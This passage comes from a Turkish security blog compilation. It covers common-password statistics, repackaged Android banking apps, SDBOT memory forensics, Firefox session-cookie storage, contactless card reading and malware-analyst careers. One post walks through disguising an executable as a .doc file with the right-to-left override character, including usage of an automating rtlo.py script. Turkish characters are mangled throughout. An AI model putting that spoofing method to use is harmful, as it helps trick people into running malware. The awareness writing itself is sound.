24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 2: Hack 4 Career - 2011

2

gggexe uzantılı dosyayı barındıran ASNe youmlnelik arama yaptığımda benzer isimli zararlı yazılımların 2011 yılının Ocak ayından buyana aynı ASN uumlzerinde tespit ediliyor olması ve tespit edilen zararlı yazılımların sayısının 300uuml aşkın olması merakımı cezbetti vedeneme yanılma ile hhhexe adı altında tespit ettiğim zararlı yazılımı kısaca incelemeye karar verdim

Bu defa daha oumlnce gerccedilekleştirmiş olduğum alışılagelmiş analizlerin aksine zararlı yazılımın ccedilalıştığı sistemin belleğini diske kaydederekbellek (memory) analizi gerccedilekleştirmeye karar verdim

Adli bilişimde bellek analizi (memory forensic) denilince akla gelen ilk araccedil Volatilitydir Aslında araccedil dersek haksızlık etmişolabiliriz ccediluumlnkuuml işin aslı Volatility Python ile yazılmış birccedilok araccediltan oluşan bir ccedilatıdır (framework) Volatility ile diskekayıt edilmiş (dump) olan bellek dosyasını analiz ederek sistem uumlzerinde ccedilalışan programlardan ağ bağlantılarına yuumlkluumlolan DLLlerden kayıt defterinde (registry) yer alan anahtarlara goumlz atmaya kadar hedef sistem ile ilgili olan birccedilok işlemgerccedilekleştirebilirsiniz

Volatility 20 suumlruumlmuuml ile Windows XP SP2SP3 Windows 2003 SP0SP1SP2 Vista SP0SP1SP2 Windows 2008 SP1SP2 veWindows 7 SP0SP1 sistem goumlruumlntuumllerini (image) analiz edilebilmektedir

Volatility ile analiz edeceğimiz bellek dosyasını oluşturmak iccedilin oumlncelikle hedef sistem uumlzerinde MoonSols firması tarafındangeliştirilen DumpIt programının ccedilalıştırılması gerekmektedir

İlk iş olarak hhhexe dosyasını Windows 7 uumlzerinde ccedilalışan Windows XP SP3 sistemine kopyaladıktan sonra Windows 7 uumlzerindeWireshark aracını ccedilalıştırarak zararlı yazılım tarafından hedef sistem uumlzerinde uumlretilmesi muhtemel olan trafiği kayıt altına almasınısağladım hhhexe dosyası uumlzerinde yer alan uumlstveriye (metadata) baktığımda Logitech firması tarafından geliştirilmiş bir araccedilmış gibikendini tanımladığını goumlrduumlm Ardından hhhexe isimli zararlı yazılımı hedef sistem uumlzerinde ccedilalıştırdıktan sonra daha oumlnce hedefsisteme kopyalamış olduğumu DumpIt aracını ccedilalıştırarak sistemin belleğini diske kayıt etmesini sağladım

3

4

Zararlı yazılımı ccedilalıştırır ccedilalıştırmaz Wireshark aracı uumlzerinde HTTP ve IRC trafiği oluştuğunu goumlrduumlm ve bir IRC istemci yazılımı iletespit edilen bu IRC sunucusuna bağlandım Sunucuya bağlandığımda kanalın boş olması botların ifşa olmasını engelleme adına oumlzelolarak geliştirilmişmodifiye edilmiş bir irc sunucusu olduğuna işaret ediyordu Botun IRC kanalına giriş yapar yapmaz internete ccedilıkışyaptığı ip adres bloğunun 445 bağlantı noktasını otomatik olarak taramaya (port scan) başlaması da goumlzuumlmden kaccedilmadı Wiresharkuumlzerindeki HTTP paketlerini incelediğimde ise botun NATlanmış IP adresini oumlğrenebilmek iccedilin bir kaccedil sayfaya bağlanmaya ccedilalıştığınıfarkettim

5

Zararlı yazılım ile ilgili daha fazla bilgi almak iccedilin Volatility ile bellek dosyasını incelemeye başladım

İlk olarak PSLIST komutu ile sistem uumlzerinde ccedilalışan işlemleri (process) listeledim ve ccedilalıştırılma zamanına goumlre zararlı yazılımın sistemuumlzerinde 2888 PIDsine sahip indekexe adı altında ccedilalıştığını goumlrduumlm

6

DLLLIST komutu ile zararlı yazılım tarafından yuumlklenen DLL dosyalarını listelediğimde ise urlmondll ve cryptdlldll dosyaları şuumlpheliduruyordu

7

CONNSCAN komutu ile sistem uumlzerindeki aktif ağ bağlantılarını listelediğimde ise 2888 PIDsi ile ccedilok sayıda bağlantı kurulduğunugoumlrduumlm

PROCEXEDUMP komutu ile indekexe yazılımına ait olan belleği diske kaydettikten sonra strings ve IDA PRO programları ileincelediğimde ise bu zararlı yazılımın SDBOTın bir varyantı olduğunu kolayca anladım

8

9

Son olarak zararlı yazılım uumlzerinde yer alan zaman damgasına baktığımda ise SDBOT varyantının hemen hemen herguumln guumlncellenipderlendiği sonucu ortaya ccedilıkıyordu

Goumlruumllduumlğuuml uumlzere bellek analizi ile zararlı yazılımlar dinamik analiz kadar olmasa da rahatlıkla analiz edilebilir ve yeterli bir eldeedilebilinir Oumlzellikle bu yazıda değinmediğim diğer Volatility komutlarına (malfind gdt apihooks idt vb) goumlz atacak olursanız bellekanalizi ile rootkit yazılımlarını dahi tespit etmeniz muumlmkuumln olabilir

Bir sonraki yazıda goumlruumlşmek dileğiyle yeni yılın herkese sağlık mutluluk ve bol kazanccedil getirmesini dilerim

Firefox Oturum Geri Yuumlkleme OumlzelliğiSource httpswwwmertsaricacomfirefox-oturum-geri-yukleme-ozelligi

10

By MS on December 12th 2011

Accuvant firmasının yaptığı araştırmaya goumlre Chrome internet tarayıcısının rakiplerinden daha guumlvenli olduğu ortaya ccedilıkmış Araştırmasonucunda ortaya ccedilıkan sıralamada Firefox internet tarayıcısının uumlccediluumlncuuml sırada yer alması kimilerini şaşırtsa da beni pek şaşırtmadı

Geccediltiğimiz guumlnlerde bir web uygulaması uumlzerinde penetrasyon testi gerccedilekleştirirken işlem (transaction) bazlı jeton (token)kullanılmaması durumunda oturum ccedilerezini (session cookie) ccedilalan art niyetli bir kişinin kurbanın oturumunu ccedilaldıktan (session hijack)sonra uygulama uumlzerinde hangi işlemleri rahatlıkla gerccedilekleştirebileceğini duumlşuumlnuumlyordum Daha sonra oturum ccedilerezinde HTTPOnlybayrağının kullanılıyor olması nedeniyle bu riskin gerccedilekleşme ihtimalini duumlşuumlnmeye başladım Ardından işletim sistemine bulaşanzararlı bir yazılımın oturum ccedilerezini ccedilalmak iccedilin izleyeceği yolları duumlşuumlnmeye başladım Oturum ccedilerezi hafızadan (RAM) ne kadarrahatlıkla ccedilalınabilirdi Meşhur bankacılık truva atları (zeus spyeye) gibi internet tarayıcıları ile ilişkili dosyalara kanca (hook) atarakmı ccedilalmak daha kolay olurdu diye duumlşuumlnuumlrken dosya sistemi uumlzerinde tutulan normal ccedilerezlerden farklı olan oturum ccedilerezlerinin dosyasistemi uumlzerinde tutuluyor olma ihtimaline nedense pek ihtimal vermiyordum ancak yine de goumlz atmaya karar verdim

Oumlncelikle sanal makine uumlzerine Chrome (150874121) Firefox (801) ve Internet Explorer (90) internet tarayıcılarının en sonsuumlruumlmlerine kurdum ve uumlccedil internet tarayıcısı ile oturum ccedilerezi ile birlikte guumlvenlik bayrağı (secure flag) ve HTTPOnly bayrağı kullanılanbir web sitesini ziyaret ettim Ardından web sitesi tarafından her bir internet tarayıcısına goumlnderilen oturum ccedilerezini not ederekinternet tarayıcıları tarafından kullanılan klasoumlrlerde bu ccedilerezleri arattığımda sadece Firefox internet tarayıcısının oturum ccedilerezini dosyasisteminde kayıt altına aldığını goumlrduumlm

11

Sessionstorejs dosyasında yer alan objeler JavaScript Object Notation (JSON) formatında saklandığı iccedilin kolay okunabilmesi adınajsbeautifierorg sitesinde iccedileriği duumlzenlettiğimde oturum ccedilerezi okunabilir hale geldi

12

Peki ne Chrome ne Internet Explorer internet tarayıcısı oturum ccedilerezini dosya sistemi uumlzerinde okunaklı olarak saklamazken Firefoxsaklıyordu ve saklamasının son kullanıcıya ne tuumlr bir etkisi olabilirdi

Web siteleri sizi her oturumda size oumlzel uumlretilen oturum ccedilerezleri uumlzerinden takip eder doğrular ve işleminizi gerccedilekleştirir Oumlrnekolarak bir internet bankacılığı uygulaması duumlşuumlnelim Uygulamaya giriş yaptıktan sonra uygulama size o oturuma oumlzel bir oturumccedilerezi goumlndererek sizin doğrulama adımlarından başarıyla geccediltiğinizi kabul eder ve gerccedilekleştireceğiniz her işlemde (işlem bazlı jetonkullanılmadığı durumlarda) oturum ccedilerezinizi kontrol ederek işleminizi gerccedilekleştirir

Peki ya bu oturum ccedilereziniz ccedilalınırsa ne olur Art niyetli kişi sizin adınıza gerccedilekleştirmeye yetkili olduğunuz tuumlm işlemleri (paratransferleri doumlviz alışsatış vs) gerccedilekleştirebilir İşte bu nedenle oturum ccedilerezlerinin dosya sistemine kayıt edilmesi ve zararlı yazılımlartarafından kolaylıkla ccedilalınabilir olması tercih edilmez

Peki Firefox internet tarayıcısı bunu neden yapıyor Beklenmeyen bir durumda (crash) yeni bir eklenti yuumlklendikten sonra veya otomatikguumlncelleştirme sonrasında internet tarayıcısının yeniden başlatılması gibi ihtiyaccedillar ortaya ccedilıktığı iccedilin oturumların kaldığı yerden devamedebilmesi (session restore) amacıyla oturum ccedilerezlerini Sessionstorejs dosyasında saklamaktadır

Her ne kadar sisteme bulaşmış zararlı bir yazılım guumlnuumln sonunda hangi internet tarayıcısı olursa olsun bellekten okuma kancaatma ve diğer youmlntemler ile oturum ccedilerezlerini ccedilalabilse de kullandığınız internet tarayıcınızın art niyetli kişilerin işlerini bu kadarkolaylaştırmıyor olması gerekmektedir

Guumlvenliğiniz iccedilin oturum geri yuumlkleme (session restore) oumlzelliğini devre dışı bırakmanızı oumlneririm Bunun iccedilin aşağıdaki iki değeri 0olarak değiştirmeniz yeterli olacaktır

13

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerimhellip

Temassız TehlikeSource httpswwwmertsaricacomtemassiz-tehlikeBy MS on November 25th 2011

Son guumlnlerde sahip olduğum kredi kartlarına baktığımda hemen hemen hepsinin temassız kredi kartı (Mastercard ise Paypass yazısı Visaise PayWave amblemi) olduğunu farkettim 2008 yılında temassız kredi kartlarının sayısı bir elin parmaklarını geccedilmezken guumlnuumlmuumlzdeartık ccediloğu banka muumlşterilerinin kredi kartlarını temassız kredi kartları ile yeniler oldu Oumlzellikle NFC (Near Field Communication)teknolojisinin cep telefonları ve akıllı telefonlarda yer alması ve yakın zamanda temassız alışverişe imkan sağlayacak olmaları nedeniyle

14

kimi haber sitelerinde yer alan haberlere goumlre yakın zamanda temaslı ve temassız kredi kartları tarih olarak yerlerini bu cihazlara bırakıyorolacaklar

Her ne kadar bu ve benzer haberlerin oumlnuumlmuumlzdeki 5 yıl iccedilerisinde gerccedilekleşme olasılığı bana goumlre duumlşuumlk olsa da bir guumlvenlik uzmanıolarak cuumlzdanımda RFID teknolojisini kullanan temassız kredi kartı taşımak yerine NFC teknolojisini kullanmayı tercih ederim Bununen buumlyuumlk nedeni cuumlzdanınızda bulunan temassız kredi kartı haberiniz olmadan herhangi bir RFID okuyucu ile okunabilirken NFCteknolojisi kullanan bir cihazda bu olasılığın oldukccedila duumlşuumlk olmasıdır nedeni ise bunun iccedilin oumlncelikle kredi kartı yerine kullanacağınızmobil uygulamayı ccedilalıştırmış ve NFC vericisini devreye sokmuş olmanız gerekmektedir

Peki benim gibi cuumlzdanında temassız kredi kartı taşıyanlar iccedilin durum ne kadar vahim veya gerccedilekten vahim mi Gelin bu soruyabirlikte yanıt arayalım

Eğer yıl 2008 olsaydı ve cuumlzdanınızda temassız kredi kartı taşıyor olsaydınız meraklı bir kişi RFIDIOt adındaki yazılım ve desteklediğiRFID okuyucu ile temassız kredi kartınızın iccedilinde yer alan etiketi okuyarak adınızı soyadınızı kredi kartı numaranızı ve kredi kartınızınson kullanma tarihini kolaylıkla oumlğrenebilirdi Nasıl mı İşte boumlyle

Guumlnuumlmuumlze gelecek olursak aynı durumun halen geccedilerli olup olmadığının yanıtını geccediltiğimiz guumlnlerde aramaya koyuldum ve testebaşlayabilmek iccedilin ilk olarak ihtiyaccedil duyacağım malzemeleri toplamaya başladım Temassız kredi kartı olarak geccediltiğimiz aylarda elimeulaşan Mastercardın temassız kredi kartını RFID okuyucu olarak OmniKey CardMan 5321 cihazını okuyucu yazılımı olarak iseRFIDIOt v10b yazılımını işletim sistemi olarak uumlzerinde Python v271 pyreadline ve pyscard moduumlllerinin kurulu olduğu Windows7 işletim sistemini kullandım

Teste başladığım zaman RFIDIOt yazılımının temassız kredi kartında yer alan etiketi okuduktan sonra Unrecognized TAG(tanımlanamayan etiket) hatasını doumlnduumlğuumlnuuml goumlrduumlm Hata ile birlikte doumlnen paketleri incelediğimde bu paketler iccedilerisinde kredikartı numaramın ve son kullanma tarihinin HEX değerlerinin yer aldığını goumlrduumlm Yaklaşık 15 sene oumlnce guumlncellenen RFIDIOtyazılımında yer alan tanımlı APDU komutlarının ve ccediloumlzuumlmleme (parse) fonksiyonlarının eski kaldığını duumlşuumlnerek alternatif yazılımlararamaya koyuldum ve Brad Antoniewiczin blogunda yer alan ChasePayPassBlink yazılımı ile karşılaştım Ancak bu yazılımın Chasebankamatikkredi kartına youmlnelik geliştirildiğini oumlğrendikten sonra elimde bulunan Mastercardın Paypass kredi kartı iccedilin bu yazılımuumlzerinde değişiklikler yapmam gerekeceğini anladım ve kısa bir araştırma ve ccedilalışmanın sonucunda ortaya Paypass Kredi Kartı Okuyucuyazılımı ccedilıkmış oldu Yazılımı ccedilalıştırır ccedilalıştırmaz temassız kredi kartından kredi kartı numarasını ve son kullanma tarihini başarıylaokuyabildiğini goumlrduumlkten sonra testi tamamladım

2008 yılından farklı olarak temassız kredi kartında yer alan etikette artık muumlşteri adı ve soyadının yer almamasını sevinccedille karşılamışolmama rağmen kredi kartı numarasının ve son kullanma tarihinin halen okunabiliyor olması her ne kadar direkt olarak dolandırıcılartarafından alehyte kullanılamayacak olsa da sosyal muumlhendislik youmlntemleri ile diğer bilgiler ile birleştirilerek kullanılma ihtimalikonusunda duumlşuumlnduumlrtmeye yetti

Peki ya sonuccedil Sonuccedil itibariyle cuumlzdanınızda veya cebinizde bulunan kredi kartı numaranız ve kredi kartınızın son kullanma tarihi birşekilde (bu 2008 yılındaki videoda olduğu gibi koca bir RFID okuyucuyu cebinize yakınlaştırarak olabilir RFID kapı anteni kullanılarakolabilir veya StrongLink gibi ufak bir okuyucu kullanarak olabilir) meraklı kişi veya kişiler tarafından okunabilir Bu ihtimal duumlşuumlkdahi olsa sizin iccedilin oumlnemli bir husus ise ccediloumlzuumlm oumlnerisi olarak 20$ gibi cuumlzi bir uumlcret oumldeyerek internetten sipariş edebileceğiniz RFIDkorumalı bir cuumlzdan kullanmanızı oumlnerebilirim

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerimhellip

Her Goumlrduumlğuumlne İnanmaSource httpswwwmertsaricacomher-gordugune-inanmaBy MS on November 1st 2011

RTLO namı diğer RIGHT-TO-LEFT OVERRIDE Windows XP işletim sistemi kullanırken pek ccediloğumuzun dikkate almadığı ancakWindows Vista ve Windows 7 işletim sistemi kullanırken ccedilok dikkatli olmamızı gerektiren bir Evrensel kod (unicode) karakteridir(u202E) RTLO kısaca karakterlerin soldan sağa değil sağdan sola olarak işlem goumlrmesini sağlar ve bu sayede sağdan sola yazılan diller(Arapccedila İbranice Suumlryanice vs) desteklenebilmektedir

Windows XP işletim sistemi varsayılan (default) olarak az oumlnce bahsi geccedilen dilleri desteklememekte ek bir paket yuumlklenerek (Installfiles for complex script and right-to-left languages) destekleyebilmekteydi Ancak Windows Vista ve Windows 7 işletim sistemlerininhayatımıza girmesi ile bu durum değişti ve varsayılan olarak bu diller desteklenir hale geldi Peki bu desteğin bizimle ne ilgisi var

Yıllarca yakınımızdakiler tarafından yapılan şu şekilde uyarılara kulak kabarttık durduk Bir dosyayı ccedilalıştırmadan oumlnce uzantısınamutlaka dikkat et Uzantısı exe ise sakın ccedilalıştırma viruumls olabilir ve bu sayede yıllar iccedilinde hepimiz ister istemez bir dosyayı

15

ccedilalıştırmadan oumlnce uzantısına dikkat eder olduk Ccediloğu kimse farkında olmasa da bu kontrol sayesinde art niyetli kişiler zararlı yazılımlarısistemlere bulaştırabilmek iccedilin daha farklı sosyal muumlhendislik youmlntemlerine başvurmak zorunda kaldılar Bu youmlntemlerden biri de RTLOevrensel kod karakterli dosya adlarına sahip zararlı yazılımlar oluşturmak oldu Peki bu dosya adlarını nasıl oluşturuyorlar da kullanıcılarıkolaylıkla kandırabiliyorlar

Oumlncelikle RTLO evrensel kod karakteri iccedileren dosya adını Windows 7 işletim sistemi uumlzerinde oluşturabilmek iccedilin kayıt defterinde(registry) bir kaccedil değişiklik yapmak ve daha sonra sistemi yeniden başlatmak gerekiyor

Bunun iccedilin izlenmesi gereken adımlar sırasıyla

bull Regedit komutu ccedilalıştırılır (Start -gt Arama kutucuğu -gt regedit)

bull HKEY_CURRENT_USERControl PanelInput Method altında EnableHexNumpad anahtarı oluşturulur ve anahtara 1 değeriatanır

bull Sistem yeniden başlatılır

Ardından exe olan program uzantısının istenilen başka bir uzantıymış gibi goumlruumlnmesi iccedilin RTLO evrensel kod karakterini dosya adındakullanıyorlar Daha net olması adına ufak bir oumlrnek uumlzerinden ilerleyelim

bull Windowssystem32 klasoumlruuml altında yer alan calcexe programını dilediğiniz bir klasoumlre kopyalayın

bull Programın uzantısının doc olarak goumlruumlnmesini sağlayacağımız iccedilin programın simgesini (icon) Microsoft Word simgesi olarakdeğiştirin (Resource Hacker programı işinizi goumlrecektir)

bull Daha sonra programın adını (rename) codexe olarak değiştirin

bull Ardından programın adını tekrar değiştirmek iccedilin programın uumlzerine farenin sağ tuşu ile basıp menuumlden yeniden adlandır (rename)oumlğesini seccedilin

bull İmleci c harfinin başına (en sol) getirin ve ardından klavyeden NUMLOCK accedilık iken ALT ve FN tuşlarına basılı tutarak +202Etuşlarına basın

Goumlrduumlğuumlnuumlz uumlzere programın uzantısı artık doc olarak goumlzuumlkuumlyor Komut satırından programın bulunduğu klasoumlrde DIR komutunuccedilalıştıracak olursanız bu yanılgının goumlruumlntuumlden ibaret olduğunu hemen anlayabilirsiniz

16

Python ile yukarıda bahsetmiş olduğum adımları (simge değiştirme hariccedil) otomatize eden RTLOpy isimli programa buradanulaşabilirsiniz

Programın kullanımı python rtlopy [extension] [source filename] [new filename]Oumlrnek kullanım python rtlopy doc calcexe Confidential_document_no_

Sonuccedil olarak Windows Vista veya Windows 7 kullanıcısıysanız ve eskiden kalma uzantı kontroluuml yaparak programları goumlzuuml kapalıccedilalıştırma alışkanlığınız varsa yakın zamanda sıkıntı yaşama ihtimaline karşı programları ccedilalıştırmadan oumlnce iccedilinde bulunduğu klasoumlrdeyer alan TYPE (Application ise dikkat) kolonuna veya HEX Editoumlr ile başlık bilgisine (ilk 2 bayt MZ ise dikkat) dikkat etmeniz faydalıolacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Zararlı Yazılım Analisti OlmakhellipSource httpswwwmertsaricacomzararli-yazilim-analisti-olmakBy MS on October 5th 2011

Son yıllarda Windows işletim sistemini hedef alan Zeus SpyEye TDL gibi hatrı sayılır zararlı yazılımlara manşetlerde sıkccedila rastlıyordukDaha sonra o ccedilok guumlvenli Mac OS X işletim sisteminin kullanım oranının artış goumlstermesi ile (bunun en buumlyuumlk nedenlerinden biri de MacOS Xe zararlı yazılım bulaşmaz yanılgısı olsa gerek) bu sisteme youmlnelik geliştirilen zararlı yazılımlar da manşetlerde yerini birer bireralmaya başladı Guumln geldi tweet atmaktan internette soumlrf yapmaya e-posta okumaktan bankacılık işlemleri gerccedilekleştirmeye kadar birccedilok alanda ihtiyaccedillarımızı karşılayabilen modern işletim sistemleri ile guumlccedillendirilmiş olan akıllı mobil cihazlar iccedilin geliştirilen zararlıyazılımlar manşetleri suumlslemeye başladı Peki bilgi hırsızlığı iccedilin geliştirilen zararlı yazılımlar neden bu kadar revaccedilta

17

Uumlnluuml bir banka soyguncusu olan Willie Suttone Neden banka soyuyorsunuz diye bir soru youmlnelten muhabirin aldığı Ccediluumlnkuuml paraorada yanıtını guumlnuumlmuumlze uyarlar ve Neden zararlı yazılım geliştiriyorsunuz diye bir soru soracak olsaydık alacağımız yanıt şuumlphesizCcediluumlnkuuml finansal getirisi ccedilok yuumlksek olurdu ve ilk sorduğumuz sorunun da yanıtını almış olurduk

Oumlyle bir duumlnyada yaşıyoruz ki hiccedil bir zaman kansere aidse ve diğer oumlluumlmcuumll hastalıklara ccedilare bulunmayacağına sadece bu hastalıklarınilerlemesini engelleyen kontrol altında tutan pahalı ilaccedilların piyasada olacağına inanıyorum BilgiBilişim guumlvenliği sektoumlruumlnuuml de aynışekilde duumlşuumlnuumlyorum Hiccedil bir zaman ccedilok guumlvenli bir işletim sistemi tasarlanmayacak veya bir antiviruumls yazılımı tuumlm zararlı yazılımlarıtespit ediyor veya sisteme bulaşmasını engelliyor olmayacak Durum boumlyle olunca da nasıl hastalıkların bulaşmasını engellemek tedavietmekten daha kolay ise aynı şekilde zararlı yazılımların da sistemlere bulaşmasını engellemek sistemlerden kaldırmaktan daha kolayolmaya devam edecek Zararlı yazılımlar ha bulaştı ha bulaşacak derken kurumlar daha fazla zararlı yazılım analistine veya bu beceriyesahip ccedilalışanları istihdam etmeye başlayacak ve bu sayede bu alanda uzmanlaşmak isteyenler bu işten keyif alanlar iccedilin zararlı yazılımanalizi hobi olmaktan ccedilıkarak mesleklerinin bir parccedilası haline doumlnuumlşecektir Oumlzellikle APTlerin dev kurumları hedef aldığı son aylardakendi personeli ile zararlı yazılım analizi yapabilen bir kurum olmanın getirisi (3 partilere guumlven kaygısı kapalı kapılar ardında ccediloumlzuumlmuumlretme ihtiyacı) paha biccedililmez olsa gerek

Peki zararlı yazılım analisti olmak iccedilin ne tuumlr bilgibecerilere sahip olmanız gerekiyor

Programlama becerisi Bilişim guumlvenliği uzmanı olupta programlama dili bilmiyorum demek kulağa ne kadar garip geliyorsa (gelmiyorsada ben ccedilok yadırgıyorum her zaman araccedillar işinizi goumlrmeyebilir) zararlı yazılım analistiyim ancak Assemblyden Javadan CdenCden anlamıyorum demek kulağa bir o kadar garip gelebilir Oumlrneğin Java ile yazılmış bir zararlı yazılımı decompile ettikten sonrakodu analiz etmeniz gerekecek bu durumda ne yapacaksınız Veya zararlı bir yazılımı assembly seviyesinde ccedilalışan bir debugger ile(Ollydbg veya Immnunity Debugger) analiz ediyorsunuz Assembly bilmeden programın akışına nasıl muumldahale edecek veya şifrelemeanahtarlarını nasıl ele geccedilireceksiniz Gereksinimler boumlyle olunca bir zararlı yazılım analistinin C ve Assembly programlama dillerineyabancı olmaması buna ilaveten diğer programlama dilleri ile yazılmış (C++ Java Net) programların kaynak kodlarına az ccedilok goumlzgezdirmiş olması gerekmektedir Bunlara ilaveten Python veya Ruby gibi programlama dillerinden faydalanarak hızlı bir şekilde kendiprogramınızı yazmanız gerekebilir Oumlrneğin hafızadan diske kayıt ettiğiniz (dump) zararlı bir yazılımdan otomatik olarak şifrelemeanahtarlarını toplayan ve şifrelemeyi ccediloumlzen bir program yazmak istiyorsunuz Şayet Python biliyorsanız IDAPython ile ufak betikler(script) yazmanız işinizi oldukccedila hızlandıracaktır Anlayacağınız uumlzere zararlı yazılım analisti olma konusunda ısrarcı iseniz birden fazlaprogramlama dili bilmeniz (uzman seviyesinde olmasa da) şart

